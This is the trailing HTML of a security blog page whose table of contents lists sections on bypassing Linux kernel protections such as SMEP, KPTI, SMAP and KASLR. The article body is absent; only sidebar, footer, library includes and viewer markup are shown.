                                    <a href="function link() { [native code] }" target="_blank"><span
                                    class=" iconfont "></span></a>
                                </dd>
                            
                            
                            
                        
                    </dl>
                </div>
                <ul>
                    <li><a href="/">13 <p>Articles</p></a></li>
                    <li><a href="/categories">7 <p>Categories</p></a></li>
                    <li><a href="/tags">9 <p>Tags</p></a></li>
                </ul>
            </div>
            
            
            
            <div class="box sticky animated fadeInRight faster">
                <div id="toc" class="subbox">
                    <h4>Contents</h4>
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Linux-Kernel-%E4%BF%9D%E6%8A%A4%E6%9C%BA%E5%88%B6%E7%BB%95%E8%BF%87"><span class="toc-number">1.</span> <span class="toc-text">Linux Kernel 保护机制绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#SMEP-KPTI-bypass"><span class="toc-number">1.1.</span> <span class="toc-text">SMEP + KPTI bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#ROP%E7%BB%95%E8%BF%87"><span class="toc-number">1.1.1.</span> <span class="toc-text">ROP绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#get-root"><span class="toc-number">1.1.2.</span> <span class="toc-text">get root</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">1.1.3.</span> <span class="toc-text">总结</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SMEP-PTI-SMAP-KASLR-bypass"><span class="toc-number">1.2.</span> <span class="toc-text">SMEP+PTI+SMAP+KASLR bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SMAP"><span class="toc-number">1.2.1.</span> <span class="toc-text">SMAP</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SMAP-bypass"><span class="toc-number">1.2.2.</span> <span class="toc-text">SMAP bypass</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#KASLR-bypass"><span class="toc-number">1.2.3.</span> <span class="toc-text">KASLR bypass</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93-1"><span class="toc-number">1.3.</span> <span class="toc-text">总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-number">1.4.</span> <span class="toc-text">参考链接</span></a></li></ol></li></ol>
                </div>
            </div>
            
            
        </div>
    </div>
</div>

    </div>
</div>
    <div id="back-to-top" class="animated fadeIn faster">
        <div class="flow"></div>
        <span class="percentage animated fadeIn faster">0%</span>
        <span class="iconfont icon-top02 animated fadeIn faster"></span>
    </div>
</body>
<footer>
    <p class="copyright" id="copyright">
        &copy; 2022
        <span class="gradient-text">
            RainSec
        </span>.
        Powered by <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a>
        Theme
        <span class="gradient-text">
            <a href="https://github.com/TriDiamond/hexo-theme-obsidian" title="Obsidian" target="_blank" rel="noopener">Obsidian</a>
        </span>
        <small><a href="https://github.com/TriDiamond/hexo-theme-obsidian/blob/master/CHANGELOG.md" title="v1.4.9.3" target="_blank" rel="noopener">v1.4.9.3</a></small>
        
        
    </p>
</footer>

<script type="text/javascript" src="https://cdn.bootcss.com/mathjax/2.7.6/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>
<script>
  MathJax.Hub.Config({
    "HTML-CSS": {
      preferredFont: "TeX",
      availableFonts: ["STIX", "TeX"],
      linebreaks: {
        automatic: true
      },
      EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
      inlineMath: [
        ["$", "$"],
        ["\\(", "\\)"]
      ],
      processEscapes: true,
      ignoreClass: "tex2jax_ignore|dno",
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
      noUndefined: {
        attributes: {
          mathcolor: "red",
          mathbackground: "#FFEEEE",
          mathsize: "90%"
        }
      },
      Macros: {
        href: "{}"
      }
    },
    messageStyle: "none"
  });
</script>
<script>
  function initialMathJax() {
    MathJax.Hub.Queue(function () {
      var all = MathJax.Hub.getAllJax(),
        i;
      // console.log(all);
      for (i = 0; i < all.length; i += 1) {
        console.log(all[i].SourceElement().parentNode)
        all[i].SourceElement().parentNode.className += ' has-jax';
      }
    });
  }

  function reprocessMathJax() {
    if (typeof MathJax !== 'undefined') {
      MathJax.Hub.Queue(["Typeset", MathJax.Hub]);
    }
  }
</script>


 
<link rel="stylesheet" href="//cdn.bootcss.com/gitalk/1.5.0/gitalk.min.css">
 
<script src="//cdn.bootcss.com/gitalk/1.5.0/gitalk.min.js"></script>
  
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/obsidian.js"></script>
<script src="/js/jquery.truncate.js"></script>
<script src="/js/search.js"></script>
 
<script src="//cdn.bootcss.com/typed.js/2.0.10/typed.min.js"></script>
 
<script src="//cdn.bootcss.com/blueimp-md5/2.12.0/js/md5.min.js"></script>
 
<script src="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>


<script src="https://cdn.bootcss.com/codemirror/5.48.4/codemirror.min.js"></script>
 
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/javascript/javascript.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/css/css.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/xml/xml.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/htmlmixed/htmlmixed.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/clike/clike.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/php/php.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/shell/shell.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/python/python.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/java/java.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/go/go.min.js"></script>
   
<script src="/js/busuanzi.min.js"></script>

<script>
  $(document).ready(function () {
    if ($('span[id^="busuanzi_"]').length) {
      initialBusuanzi();
    }
  });
</script>
 
<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/default-skin/default-skin.min.css">


<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>
  

<script>
  function initialTyped() {
    var typedTextEl = $('.typed-text');
    if (typedTextEl && typedTextEl.length > 0) {
      var typed = new Typed('.typed-text', {
        strings: ['艺术家思维去思考问题，工匠创造精神去开发|', '致力于自动化渗透测试和漏洞挖掘'],
        typeSpeed: 90,
        loop: true,
        loopCount: Infinity,
        backSpeed: 20,
      });
    }
  }

  if ($('.article-header') && $('.article-header').length) {
    $(document).ready(function () {
      initialTyped();
    });
  }
</script>




<!-- 引用依赖 -->
<script>document.write(aplayerconf)</script>




</html>
